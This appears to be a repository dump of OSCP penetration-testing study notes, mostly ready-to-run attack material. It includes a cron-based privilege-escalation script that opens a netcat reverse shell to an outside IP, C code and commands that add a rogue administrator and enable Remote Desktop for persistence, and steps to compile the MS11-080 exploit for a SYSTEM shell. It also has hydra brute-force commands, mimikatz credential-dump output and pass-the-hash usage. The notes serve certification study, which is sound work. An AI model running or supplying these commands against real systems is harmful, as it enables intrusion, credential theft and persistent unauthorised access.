3 | 3. Labs report will be based on Offensive Security Penetration Test Report for Internal Lab and Exam https://www.offensive-security.com/pwk-online/PWKv1-REPORT.doc
4 | 3. Write new chapter in final Pentest Report after pwning of the machine (based on working notes from KeepNote)
5 | 4. Collect nmap scan in the nmap format
6 | 5. Collect network data in XLS spreadsheet
7 | 6. Collect data in MSF database (db_nmap)
8 | 7. Draw network map in Armitage based on MSF database (or Maltego? Sparta?)


--------------------------------------------------------------------------------
/EXAM/pentest-reports/curated-list-pentest-reports:
--------------------------------------------------------------------------------
1 | https://github.com/juliocesarfort/public-pentesting-reports


--------------------------------------------------------------------------------
/EXAM/tips:
--------------------------------------------------------------------------------
1 | Report all Lab excercises
2 | Report internal lab penetration tests and document in final format (no notes)
3 | Reserve 48h
4 | Take breaks
5 | Eat good meal
6 | Take a nap
7 | You need 70 points to pass (1 root/system = 20 pts, 1 limited root/system = 10 pts)
8 | Be patient...enumarate, enumearate even more...
9 | 


--------------------------------------------------------------------------------
/EXAM/useful-notes:
--------------------------------------------------------------------------------
 1 | Never assume anything
 2 | Do not overthink it.
 3 | AccessChk can be bad. See https://forums.offensive-security.com/showthread.php?t=6523
 4 | Take snapshots of the VM
 5 | Some machines have multiple IPs and different hostnames for each IP. See https://forums.offensive-security.com/forumdisplay.php?f=106
 6 | Always think about proxychains
 7 | Try harder
 8 | Enumerate some more (UDP ?)
 9 | If you want to wget something from your machine first make sure that apache (python web server) is running
10 | If you want to load a php webshell from your server make sure that php is not running on your box .. or you found a complicated way to your local root .. congratulations
11 | When transferring files with FTP, use binary instead of ASCII:
12 |     ftp> open 192.168.13.203
13 |     ftp> binary
14 |     200 Type set to I.
15 |     ftp> put plink2.exe
16 | 
17 | RAM forensics
18 | tcdump
19 | 


--------------------------------------------------------------------------------
/PRIVESC/Linux/netcat-and-crontab.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | # privilege escalation script with netcat and cron.hourly
 3 | #  make sure chmod 777 ./privesc
 4 | #  ls -lah to check permissions
 5 | #  cp -f ./privesc /etc/cron.hourly/privesc
 6 | # check the time with the "date" command and wait
 7 | # for the script to be run at the specific time
 8 | ##  admin@canyoupwnme:/tmp$ cat /etc/crontab | grep -i hour
 9 | #    Add this to crontab      *	* * *	root    
10 | ## cd / && run-parts --report /etc/cron.hourly
11 | ###
12 | # mknod info here http://man7.org/linux/man-pages/man2/mknod.2.html
13 | # The system call mknod() creates a filesystem node (file, device
14 | # special file, or named pipe) named pathname, with attributes
15 | # specified by mode and dev
16 | 
17 | mknod /tmp/backpipe p
18 | /bin/sh 0</tmp/backpipe|nc 192.168.230.151 2233 1>/tmp/backpipe &
19 | 


--------------------------------------------------------------------------------
/PRIVESC/Windows/accesschk.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/accesschk.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/convert-python-exploits-to-exe:
--------------------------------------------------------------------------------
 1 | ## convert python exploits to windows executable
 2 | #Download the exploit:
 3 | wget -O ms11-080.py http://www.exploit-db.com/download/18176
 4 | 
 5 | #Convert python to Windows executable. Works only on a Windows machine
 6 | //first install pywin32-218.win32-py2.7
 7 | //then unzip pyinstaller-2.1 on the Desktop
 8 | copy the exploit code to the Windows machine (via http server)
 9 | save the file in the pyinstaller directory (as a .txt file)
10 | 
11 | #go to the pyinstaller directory with cmd
12 | cd
13 | 
14 | #rename the exploit from .txt to .py
15 | move ms11-080.txt ms11-080.py
16 | 
17 | #compile to .exe (be in the pyinstaller folder)
18 | python pyinstaller.py -­‐onefile	ms11-­080.py
19 | 
20 | #the .exe will be located in the pyinstaller, ms11-080 subdirectory / dist
21 | 
22 | #copy the .exe in the webroot folder and download it to the victom machine with a web browser
23 | 
24 | #run the exploit on a limited user account
25 | and you will get SYSTEM shell


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/Eula.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/Eula.txt


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/PsExec.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/PsExec.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/PsGetsid.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/PsGetsid.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/PsInfo.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/PsInfo.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/PsLoggedon.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/PsLoggedon.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/PsService.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/PsService.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/Pstools.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/Pstools.chm


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/psfile.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/psfile.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/pskill.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/pskill.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/pslist.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/pslist.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/psloglist.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/psloglist.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/pspasswd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/pspasswd.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/psping.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/psping.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/psshutdown.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/psshutdown.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/pssuspend.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/PRIVESC/Windows/sysinternals/pssuspend.exe


--------------------------------------------------------------------------------
/PRIVESC/Windows/sysinternals/psversion.txt:
--------------------------------------------------------------------------------
1 | PsTools Version in this package: 2.44
2 | 


--------------------------------------------------------------------------------
/PRIVESC/Windows/useradd.c:
--------------------------------------------------------------------------------
1 | #include <stdlib.h>
2 | int main ()
3 | {
4 | 	int i;
5 | 	i=system ("net localgroup administrators lowpriv /add");
6 | 	return 0;
7 | }
8 | 


--------------------------------------------------------------------------------
/PRIVESC/ncat_transfr files.txt:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | #On sending machine
4 | nc -w 3 [destination] 1234 < send.file
5 | 
6 | #on receiving end:
7 | cmd /c nc.exe -l -v -p 1234 > PsExec.exe
8 | 


--------------------------------------------------------------------------------
/Post-exploitation/windows.txt:
--------------------------------------------------------------------------------
 1 | 
 2 | === Metasploit ===
 3 | 
 4 | meterpreter > load mimikatz
 5 | Loading extension mimikatz...Success.
 6 | meterpreter > msv
 7 | [+] Running as SYSTEM
 8 | [*] Retrieving msv credentials
 9 | msv credentials
10 | ===============
11 | 
12 | AuthID   Package    Domain        User             Password
13 | ------   -------    ------        ----             --------
14 | 0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
15 | 0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
16 | 0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
17 | 0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
18 | 
19 | meterpreter > kerberos
20 | [+] Running as SYSTEM
21 | [*] Retrieving kerberos credentials
22 | kerberos credentials
23 | ====================
24 | 
25 | AuthID   Package    Domain        User             Password
26 | ------   -------    ------        ----             --------
27 | 0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
28 | 0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
29 | 0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
30 | 0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
31 | 
32 | meterpreter > livessp
33 | [+] Running as SYSTEM
34 | [*] Retrieving livessp credentials
35 | livessp credentials
36 | ===================
37 | 
38 | AuthID   Package    Domain        User             Password
39 | ------   -------    ------        ----             --------
40 | 0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
41 | 0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
42 | 0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
43 | 0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
44 | 
45 | meterpreter > ssp
46 | [+] Running as SYSTEM
47 | [*] Retrieving ssp credentials
48 | ssp credentials
49 | ===============
50 | 
51 | AuthID  Package  Domain  User  Password
52 | ------  -------  ------  ----  --------
53 | 
54 | meterpreter > tspkg
55 | [+] Running as SYSTEM
56 | [*] Retrieving tspkg credentials
57 | tspkg credentials
58 | =================
59 | 
60 | AuthID   Package    Domain        User             Password
61 | ------   -------    ------        ----             --------
62 | 0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
63 | 0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
64 | 0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
65 | 0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
66 | 
67 | meterpreter > 
68 | 


--------------------------------------------------------------------------------
/Python_Servers:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | Simple Python servers:
 4 | 
 5 | 
 6 |     == HTTP ==
 7 |     
 8 | -- python_http_server.py --
 9 | 
10 | import SimpleHTTPServer
11 | import SocketServer
12 | PORT = 8000
13 | Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
14 | httpd = SocketServer.TCPServer(("", PORT), Handler)
15 | print "serving at port", PORT
16 | httpd.serve_forever()
17 | 
18 | 
19 | 
20 |     == FTP ==
21 | apt-get install python-pyftpdlib 
22 | python -m pyftpdlib -p 21
23 | 
24 |     == TFTP ==
25 |    
26 | msf > use auxiliary/server/tftp
27 | msf auxiliary(tftp) > set TFTPROOT /some/folder"
28 | TFTPROOT => /some/folder
29 | 
30 | msf auxiliary(tftp) > run
31 | [*] Auxiliary module execution completed
32 | msf auxiliary(tftp) > 
33 | [*] Starting TFTP server on 0.0.0.0:69...
34 | [*] Files will be served from /some/folder
35 | [*] Uploaded files will be saved in /tmp
36 | msf auxiliary(tftp) > 
37 | 
38 | From the Windows client:
39 | TFTP.EXE -i 10.11.0.159 get fgdump.exe C:\Users\Public
40 | 
41 | #TFTP manual
42 | https://technet.microsoft.com/en-us/library/ff698993(v=ws.11).aspx
43 | 
44 | 
45 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Hello,
2 | 
3 | If you are here, you are probably studying for OSCP, so I whish you good luck.
4 | 
5 | 


--------------------------------------------------------------------------------
/bruteforce & password_attacks/Crack Ms Office _ 2007/Makefile:
--------------------------------------------------------------------------------
1 | RC-40-brute:
2 | 	gcc -fopenmp -O3 -Wall RC4-40-brute.c rc4.c -lcrypto -o RC4-40-brute
3 | 


--------------------------------------------------------------------------------
/bruteforce & password_attacks/Crack Ms Office _ 2007/README.md:
--------------------------------------------------------------------------------
1 | RC4-40-brute-office
2 | ===================
3 | 
4 |  Guaranteed cracking of M$ Office files using RC4 40-bit encryption


--------------------------------------------------------------------------------
/bruteforce & password_attacks/Crack Ms Office _ 2007/rc4.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * Our own RC4 based on the "original" as posted to sci.crypt in 1994 and
 3 |  * tweaked for  performance  on  x86-64.   OpenSSL is probably faster for
 4 |  * decrypting larger amounts of data but we are more interested in a very
 5 |  * fast key setup.  On Intel and AMD x64, I have seen up to 50% speedups.
 6 |  *
 7 |  * The speed  improvement  (if you see one) is due to OpenSSL's  (or your
 8 |  * distributor's) choice of type for RC4_INT. Some systems perform bad if
 9 |  * this is defined as char. Others perform bad if it's not. If needed, we
10 |  * could move JOHN_RC4_INT to arch.h
11 |  *
12 |  * Syntax is same as OpenSSL;
13 |  * just #include "rc4.h"  instead of  <openssl/rc4.h>
14 |  *
15 |  * Put together by magnum in 2011. No Rights Reserved.
16 |  */
17 | 
18 | #include "rc4.h"
19 | 
20 | #define swap_byte(a, b) { RC4_INT swapByte = (*a); (*a) = (*b); (*b) = swapByte; }
21 | 
22 | #define swap_state(n) { \
23 | 	index2 = (key_data_ptr[index1] + state[(n)] + index2) % 256; \
24 | 	swap_byte(&state[(n)], &state[index2]); \
25 | 	if (++index1 == key_data_len) index1 = 0; \
26 | }
27 | 
28 | void RC4_set_key(RC4_KEY *key, RC4_INT key_data_len, const unsigned char *key_data_ptr)
29 | {
30 | 	RC4_INT index1;
31 | 	RC4_INT index2;
32 | 	RC4_INT *state;
33 | 	RC4_INT counter;
34 | 
35 | 	state = &key->state[0];
36 | 	for(counter = 0; counter < 256; counter++)
37 | 		state[counter] = counter;
38 | 	key->x = 0;
39 | 	key->y = 0;
40 | 	index1 = 0;
41 | 	index2 = 0;
42 | 	for(counter = 0; counter < 256; counter += 4) {
43 | 		swap_state(counter);
44 | 		swap_state(counter + 1);
45 | 		swap_state(counter + 2);
46 | 		swap_state(counter + 3);
47 | 	}
48 | }
49 | 
50 | void RC4(RC4_KEY *key, RC4_INT buffer_len, const unsigned char *buffer_ptr, unsigned char *out)
51 | {
52 | 	RC4_INT x;
53 | 	RC4_INT y;
54 | 	RC4_INT *state;
55 | 	RC4_INT counter;
56 | 
57 | 	x = key->x;
58 | 	y = key->y;
59 | 
60 | 	state = &key->state[0];
61 | 	for(counter = 0; counter < buffer_len; counter ++)
62 | 		{
63 | 			x = (x + 1);
64 | 			y = (state[x] + y) % 256;
65 | 			swap_byte(&state[x], &state[y]);
66 | 			*out++ = buffer_ptr[counter] ^ state[(state[x] + state[y]) % 256];
67 | 		}
68 | 	key->x = x;
69 | 	key->y = y;
70 | }
71 | 


--------------------------------------------------------------------------------
/bruteforce & password_attacks/Crack Ms Office _ 2007/rc4.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * Our own RC4 based on the "original" as posted to sci.crypt in 1994 and
 3 |  * tweaked for  performance  on  x86-64.   OpenSSL is probably faster for
 4 |  * decrypting larger amounts of data but we are more interested in a very
 5 |  * fast key setup.  On Intel and AMD x64, I have seen up to 50% speedups.
 6 |  *
 7 |  * The speed  improvement  (if you see one) is due to OpenSSL's  (or your
 8 |  * distributor's) choice of type for RC4_INT. Some systems perform bad if
 9 |  * this is defined as char. Others perform bad if it's not. If needed, we
10 |  * could move JOHN_RC4_INT to arch.h
11 |  *
12 |  * Syntax is same as OpenSSL;
13 |  * just #include "rc4.h"  instead of  <openssl/rc4.h>
14 |  *
15 |  * Put together by magnum in 2011. No Rights Reserved.
16 |  */
17 | 
18 | #ifndef HEADER_RC4_H
19 | #define HEADER_RC4_H
20 | 
21 | #define RC4_KEY JOHN_RC4_KEY
22 | #define RC4_INT JOHN_RC4_INT
23 | #define RC4_set_key JOHN_RC4_set_key
24 | #define RC4 JOHN_RC4
25 | 
26 | #define JOHN_RC4_INT unsigned int
27 | 
28 | typedef struct rc4_key
29 | {
30 | 	RC4_INT state[256];
31 | 	RC4_INT x;
32 | 	RC4_INT y;
33 | } RC4_KEY;
34 | 
35 | extern void RC4(RC4_KEY *key, RC4_INT len, const unsigned char *indata, unsigned char *outdata);
36 | extern void RC4_set_key(RC4_KEY *key, RC4_INT len, const unsigned char *data);
37 | 
38 | #endif /* HEADER_RC4_H */
39 | 


--------------------------------------------------------------------------------
/bruteforce & password_attacks/Crack Ms Office _ 2007/zip.hashes:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/UserXGnu/OSCP-cheat-sheet-1/c3c5033caed74c6312ac27cbbccff68521493fb4/bruteforce & password_attacks/Crack Ms Office _ 2007/zip.hashes


--------------------------------------------------------------------------------
/bruteforce & password_attacks/bruteforce_commands.txt:
--------------------------------------------------------------------------------
 1 | # convert hashes to uppercase for LM hashes
 2 | tr a-z A-Z < ./ralph2.txt
 3 |  
 4 |   ## SMB bruteforece
 5 | nmap --script=smb-brute.nse 192.x.x.x
 6 | nmap -sV -p 445 --script smb-brute 192.168.13.200-254
 7 | acccheck -v -t 10.1.1.22 -u kevin -P /usr/share/wordlists/rockyou.txt
 8 | 
 9 | ## HTTP bruteforce (forms)
10 | hydra -l admin -P /root/ctf_wordlist.txt domain.com http-post-form "/admin.php:u=^USER^&p=^PASS^&f=login:'Enter your username and password to continue'" -V
11 | 
12 |   ## RDP bruteforce
13 | hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt rdp://192.168.x.x
14 | 
15 |   ## SSH bruteforce
16 | hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.13.234 ssh
17 | hydra -t 4 -L /usr/share/wordlists/cristi.txt -P /usr/share/wordlists/cristi-passwords.txt 192.168.13.236 ssh
18 | hydra -t 4 -L /usr/share/wordlists/cristi.txt -p some_passsword 192.168.13.236 ssh
19 | hydra -t 4 -l root -P /usr/share/wordlists/cristi-passwords.txt 127.0.0.1 -s 50000 ssh
20 | 
21 |   ## Bruteforce FTP
22 | hydra -t 4 -L /usr/share/wordlists/cristi.txt -P /usr/share/wordlists/cristi-passwords.txt 192.168.13.236 ftp
23 | use auxiliary/scanner/ftp/ftp_login
24 | 
25 |   ##Bruteforce POP3
26 | hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.158 pop3
27 | 
28 |   ## DNS bruteforce
29 | nmap -p 80 --script dns-brute.nse domain.com 
30 | python dnscan.py -d domain.com -w ./subdomains-10000.txt
31 | 
32 |   ## MySQL bruteforce
33 | nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt -vv 192.168.31.139
34 |    OR with hexorbase
35 | 
36 |  ## SMTP brute force
37 | hydra -s 25 -v -V -l root@ucal.local -P /usr/share/wordlists/rockyou.txt -t 1 -w 20 -f 192.168.29.55 smtp
38 | 
39 | -l LOGIN name
40 | -P load several passwords from FILE
41 | -s port
42 | -v verbose mode
43 | -V show login+pass combination for each attempt
44 | -t run TASKS number of connects in parallel
45 | -w waittime for responses (32s) / between connects per thread
46 | -f exit after the first found login/password pair
47 | 
48 |   ## Telnet bruteforce
49 | 
50 | use auxiliary/scanner/telnet/telnet_login
51 | msf auxiliary(telnet_login) > set BLANK_PASSWORDS false
52 | BLANK_PASSWORDS => false
53 | msf auxiliary(telnet_login) > set PASS_FILE passwords.txt
54 | PASS_FILE => passwords.txt
55 | msf auxiliary(telnet_login) > set RHOSTS 192.168.1.0/24
56 | RHOSTS => 192.168.1.0/24
57 | msf auxiliary(telnet_login) > set THREADS 254
58 | THREADS => 254
59 | msf auxiliary(telnet_login) > set USER_FILE users.txt
60 | USER_FILE => users.txt
61 | msf auxiliary(telnet_login) > set VERBOSE false
62 | VERBOSE => false
63 | msf auxiliary(telnet_login) > run
64 | 
65 | msf auxiliary(telnet_login) > sessions -l  // to see the sessions that succeded
66 | 
67 |     ## MySql, Oracle, PostgreSQL, SQLlite, MS-Sql bruteforcer and database browser
68 | hexorbase
69 | 
70 |   ## Generate a wordlist from a webpage
71 | cewl www.megacorpone.com -m 6 -w /root/newfilelist.txt 2>/dev/null
72 | 
73 |   ## Mangle/permutate a wordlist with john
74 | john --wordlist=cewlgeneratedwordlist.txt --rules --stdout > megamangled.txt
75 | 
76 |   ## Drupal bruteforce attack
77 |   #crack the password of admin
78 | site="192.168.230.147"
79 | id=$(curl -s http://$site/user/|grep "form_build_id" |cut -d"\"" -f6)
80 | hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V
81 | 
82 | #crack MD5 with hashcat and wordlist. a=0 is straight attack
83 | oclHashcat64.exe -m 0 -a 0 C:\Users\Cristi\Downloads\hashuri.txt F:\wordlist\realuniq.lst
84 | oclHashcat64.exe -m 0 -pw-max=8 C:\Users\Cristi\Downloads\hashuri.txt F:\wordlist\realuniq.lst
85 | 
86 | #Brute force Wordpress (PHPASS)
87 | cudahashcat64.exe -m 400 -a 3 hashfile wordlist
88 | 


--------------------------------------------------------------------------------
/bruteforce & password_attacks/office2john.py/read-me:
--------------------------------------------------------------------------------
 1 | 
 2 | python ./office2john.py ./filename.docx
 3 | 
 4 | //filename being the protected document. 
 5 | After a second you will see the output like below:
 6 | 
 7 | root@k22:~/Downloads/crackers/Microsoft Office RC40 cracker# python ./office2john.py ../file1.docx 
 8 | file1.docx:$office$*2007*20*128*16*75a4db9cc30c376ad9e05505b1afa100*d777bd01af371bbcc21139e34119b832*1c091f9e02d549f98073ed060429a4649d2c0d6b
 9 | 
10 |  oclHashcat -a 0 -m 9400 -status -o found.txt hash.txt pass.txt
11 | //use -resume to restart a paused job
12 | 
13 | 
14 | Office 97-03(MD5+RC4,oldoffice$0,oldoffice$1): flag -m 9700 
15 | Office 97-03(MD5+RC4,collider-mode#1): flag -m 9710
16 | Office 97-03(MD5+RC4,collider-mode#2): flag -m 9720
17 | Office 97-03(SHA1+RC4,oldoffice$3,oldoffice$4): flag -m 9800
18 | Office 97-03(SHA1+RC4,collider-mode#1): flag -m 9810
19 | Office 97-03(SHA1+RC4,collider-mode#2): flag -m 9820
20 | Office 2007: flag -m 9400 
21 | Office 2010: flag -m 9500
22 | Office 2013: flag -m 9600
23 | 
24 | 
25 | http://blog.infosecsee.com/2015/02/cracking-password-protected-word-excel.html
26 | http://pentestcorner.com/cracking-microsoft-office-97-03-2007-2010-2013-password-hashes-with-hashcat/
27 | 
28 | 


--------------------------------------------------------------------------------
/bruteforce & password_attacks/pass-the-haash:
--------------------------------------------------------------------------------
 1 | 
 2 | Using fgdump.exe you dump the password hashes
 3 | From the hash file you copy the LM and NTML part of a line:
 4 | 
 5 | Administrator:500:NO PASSWORD*********************:259745CB123A52AA2E693AAACCA2DB52
 6 | 
 7 | You replace the NO PASSWORD*** with the LM hash of the specified password
 8 | then export both as a variable:
 9 | 
10 | root@kali:~/Desktop/OSCP# export SMBHASH=0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52
11 | 
12 | 
13 | root@kali:~/Desktop/OSCP# /usr/bin/pth-winexe -U administrator% //10.11.1.5 cmd
14 | E_md4hash wrapper called.
15 | HASH PASS: Substituting user supplied NTLM HASH...
16 | smb_signing_good: BAD SIG: seq 1
17 | ERROR: Cannot connect to svcctl pipe. NT_STATUS_ACCESS_DENIED.
18 | root@kali:~/Desktop/OSCP/ALICE# 
19 | 
20 | And it should work, but it doesn't.
21 | Such mistery, much amazing.
22 | 
23 | 
24 | The fix:
25 | Ok, its only taken me two solid days but I've worked out what the issue is. 
26 | I have pwned two different machines and downloaded the hashes, but no matter what I did I couldn't get pth-winexe it to work. I was getting the same error as you. I cloned the updated PTH files from Git and when I ran the command from those files I got a slightly different more descriptive error message. I searched for that error message on Google and found out that there is a specific service that needs to be running on the target host. I went back to one of my pwned boxes and sure enough the service was not running. Once I started the servcie the pth-winexe command worked, even from the original installed files, no need for the git versions. 
27 | 
28 | I hope that's not too much of a spoiler Mods?
29 | 
30 | BTW, 
31 | pth-winexe -U Administrator%yyyyyyyyyyyyyyyyyyyyyyyyyyyyy:xxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxx //10.11.1.xxx cmd
32 | gives the error message, but the following works, it authenticates but doesn't give a shell; 
33 | pth-wmis -U Administrator%yyyyyyyyyyyyyyyyyyyyyyyyyyyyy:xxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxx //10.11.1.xxx cmd
34 | HASH PASS: Substituting user supplied NTLM HASH...
35 | HASH PASS: Substituting user supplied NTLM HASH...
36 | [wmi/wmis.c:172:main()] 1: cmd
37 | NTSTATUS: NT_STATUS_OK - Success
38 | 
39 | I found the following page, which I'm going to give a try; 
40 | http://passing-the-hash.blogspot.ro/2013/07/WMIS-PowerSploit-Shells.htmll
41 | 


--------------------------------------------------------------------------------
/bruteforce & password_attacks/steghide-bruteforce-tool:
--------------------------------------------------------------------------------
 1 | 
 2 | # Tool for bruteforcing steghide password autentication
 3 | # crashes when using '
 4 | 
 5 | git clone https://github.com/Va5c0/Steghide-Brute-Force-Tool.git
 6 | cd Steghide-Brute-Force-Tool/
 7 | chmod +x ./steg_brute.py
 8 | pip install progressbar
 9 | python ./steg_brute.py -b -d /usr/share/wordlists/rockyou.txt -f cruise-114152_1280.jpg
10 | 


--------------------------------------------------------------------------------
/bruteforce & password_attacks/zip-cracker.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | echo "ZIP-JTR Decrypt Script";
 3 | if [ $# -ne 2 ]
 4 | then
 5 | echo "Usage $0 <zipfile> <wordlist>";
 6 | exit;
 7 | fi
 8 | unzip -l $1
 9 | for i in $(john --wordlist=$2 --rules --stdout) 
10 | do
11 |  echo -ne "\rtrying \"$i\" " 
12 |  unzip -o -P $i $1 >/dev/null 2>&1 
13 |  STATUS=$?
14 |  if [ $STATUS -eq 0 ]; then
15 |  echo -e "\nArchive password is: \"$i\"" 
16 |  break
17 |  fi
18 | done
19 | 


--------------------------------------------------------------------------------
/persistence/persistence_windows.txt:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | # Add Windows user:
 4 | net user /add hacker 1234567
 5 | 
 6 | # Add user to Administrators groups
 7 | net localgroup administrators /add hacker
 8 | 
 9 | # Add user to Remote Desktop user group
10 | net localgroup "Remote Desktop users" hacker /add
11 | 
12 | # Start Remote Desktop service
13 | net start TermService
14 | 
15 | # Is Remote Desktop Service running?
16 | tasklist /svc | findstr /C:TermService
17 | 
18 | # Permanently enable Terminal Services
19 | sc config TermService start=auto
20 | 
21 | # Enable Terminal services through registry  // reboot after
22 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
23 | 
24 | 


--------------------------------------------------------------------------------
/whatis/RPC-definition:
--------------------------------------------------------------------------------
1 | Microsoft Remote Procedure Call (RPC) is a powerful technology for creating distributed client/server programs. RPC is an interprocess communication technique that allows client and server software to communicate. The Microsoft RPC facility is compatible with the Open Group’s Distributed Computing Environment (DCE) specification for remote procedure calls and is interoperable with other DCE-based RPC systems, such as those for HP-UX and IBM AIX UNIX–based operating systems.
